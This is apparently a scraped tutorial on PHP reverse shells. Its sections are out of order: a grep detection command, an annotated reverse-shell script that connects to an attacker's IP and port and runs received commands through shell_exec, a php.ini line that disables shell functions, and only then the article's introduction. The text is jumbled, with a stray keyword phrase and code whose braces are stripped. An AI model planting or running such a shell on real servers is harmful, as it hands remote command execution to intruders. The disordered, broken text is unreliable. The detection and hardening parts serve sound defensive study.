grep -R "fsockopen\|exec\|system\|shell_exec\|popen\|proc_open" /var/www/html/
Here is a simplified, annotated version. The most famous public example is the php-reverse-shell.php from PentestMonkey (now maintained in the laudanum project).
<?php // Set the attacker's IP address and listening port $ip = '192.168.1.100'; // CHANGE THIS $port = 4444; // CHANGE THIS// Create a TCP socket $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) // Failed to connect echo "Error: $errstr ($errno)"; exit(1);
// Redirect STDIN, STDOUT, STDERR to our socket // This allows the shell to read input from the attacker and send output back fwrite($sock, "Connected! Type commands:\n"); while (!feof($sock)) // Send a prompt fwrite($sock, "shell> ");
// Read command from attacker $cmd = fgets($sock, 1024); if (trim($cmd) == "exit") break; // Execute command and capture output $output = shell_exec($cmd . " 2>&1"); // 2>&1 includes stderr // Send output back to attacker fwrite($sock, $output);
fclose($sock); ?>
Edit php.ini:
disable_functions = exec, shell_exec, system, passthru, popen, proc_open, pcntl_exec, fsockopen, pfsockopen, socket_create, stream_socket_client
Caveat: This breaks some legitimate apps (e.g., certain WordPress backup plugins).
In the world of cybersecurity, the term "shell" refers to a user interface that allows access to an operating system’s services. When that shell is established from a target machine back to an attacker’s machine, bypassing standard firewall rules, it is called a Reverse Shell.
When the target server runs PHP (a language powering over 75% of the web, including platforms like WordPress, Joomla, and Laravel), the PHP Reverse Shell becomes a weapon of choice for penetration testers and, unfortunately, malicious actors. Reverse Shell Php
This article serves as a technical deep dive. We will explore what a PHP reverse shell is, how it works, a breakdown of a classic script, advanced obfuscation techniques, and—most critically—how defenders can detect and prevent these attacks.
To understand a reverse shell, you must first understand a bind shell.